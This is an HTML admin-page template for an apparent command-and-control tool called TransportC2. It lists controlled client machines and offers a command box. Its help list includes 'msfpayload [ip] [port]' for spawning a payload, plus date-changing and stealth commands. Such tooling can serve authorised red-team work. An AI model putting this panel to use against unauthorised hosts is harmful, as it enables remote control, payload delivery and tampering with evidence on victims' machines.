<html>
  <head>
  <title>TransportC2</title>
    <!-- Update ExternalIP -->
    <script type="text/javascript" src="/static/js/transport.js"></script>
    <link rel="stylesheet" type="text/css" href="/static/css/transport.css">
    <!-- JavaScript code for auto refresh tables-->
    <script src="https://code.jquery.com/jquery-3.3.1.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
    <script>
      // Functions for auto-refresh
      CommandLog();
      ActiveClients();
      ActiveUsers();
      window.setInterval(CommandLog, 3000);
      window.setInterval(ActiveClients, 30000);
      window.setInterval(ActiveUsers, 3000);
    </script>
  </head>
  <body>
    <table height="100%" width="100%" cellpadding="0" cellspacing="0" border="0">
      <tr style="border-bottom:thin solid black;" height="65px">
        <td  width="175px" class="heading" style="border-right:thin solid black;padding-top:5px;">
          TransportC2
          <hr width="120px">
          Admin Interface
        </td>
	    <td class="nav_bar">
          <input class="nav_button" type="button" onclick="Home();" value="Home">
          <input class="nav_button" type="button" onclick="Refresh();" value="Refresh">
          <input class="nav_button" type="button" onclick="AddAdmin();" value="Add Admin">
          <input class="nav_button" type="button" onclick="PassChange();" value="Change Password">
          <input class="nav_button" type="button" onclick="MasterLog();" value="View Logs">
          <input class="nav_button" type="button" onclick="LogOut();" value="Log Out">
        </td>
      </tr>

      <tr height="300px">
	    <td class="AdminList" rowspan="2">
          <div>
            <p class="AdminHeading">Active Admins:</p>
            <ul id="active_users">
                <!-- Dynamic list of active users -->
            </ul>
          </div>
        </td>
        <!-- CMD Input Form -->
        <td style="border-top:thin solid black;">
          <div>
            <form action="" method="POST" class="cmd_form">
              <br>
              <p class="heading2"> Command Center: </p>
              <label>Clients:
                <div style="font-size:10px;padding:0;">Note: Clients refresh every 30 seconds and will remove checked fields</div></label>
              <table id="client_table" cellpadding="0" cellspacing="0">
                <thead>
                  <th width="25px"><input type="checkbox" onClick="SelectAll();" /></th>
                  <th width="125px">Hostname</th>
                  <th width="160px">OS / Version</th>
                  <th width="125px">Src Address</th>
                  <th width="125px">PID</th>
                  <th width="125px">Type</th>
                  <th width="125px">Protocol</th>
                </thead>
                <tbody>
                  <!-- Dynamic insert row for each active clients -->
                </tbody>
              </table>

              <br><br>
              Command:<br>
              <textarea name="command" placeholder="CMD Here" id="ClientCmd"></textarea><br>
              <!-- Help Toolip dropdown content -->
                <div style="font-size: 12px;padding: 0;" class="tooltip">Need Help?
                  <ul style="font-size:12px;" type="square" class="tooltiptext">
                    <li>stealth [int1] [int2]</li>
                    <li>msfpayload [ip] [port]</li>
                    <li>change_date [4dg yr],[month],[day]</li>
                    <li>close</li>
                    <li>[command]</li>
                  </ul>
                </div>
              <br>
              <br>
              <input type="button" value="Submit" onclick="CmdSubmit();">
              <input type="reset" value="Reset">
              <input type="button" onclick="ClearCMD();" value="Clear Active CMD">
              <br><br>
            </form>
          </div>
        </td>
      <tr>
        <td>
          <div>
            <!-- DB Log Table -->
            <table cellpadding=4 id="log_table">
              <thead>
                <tr><td colspan="5"><p class="heading2"><br>Command Log:<br><br></p></td></tr>
                <tr>
                  <th>User</th>
                  <th>Agent</th>
                  <th>Time</th>
                  <th>Command</th>
                  <th>Response</th>
                </tr>
              </thead>
              <tbody id="log_output">
                <!-- Dynamically add DB log contents -->
              </tbody>
            </table>
          </div>
	    </td>
      </tr>
    </table>
  </body>
</html>
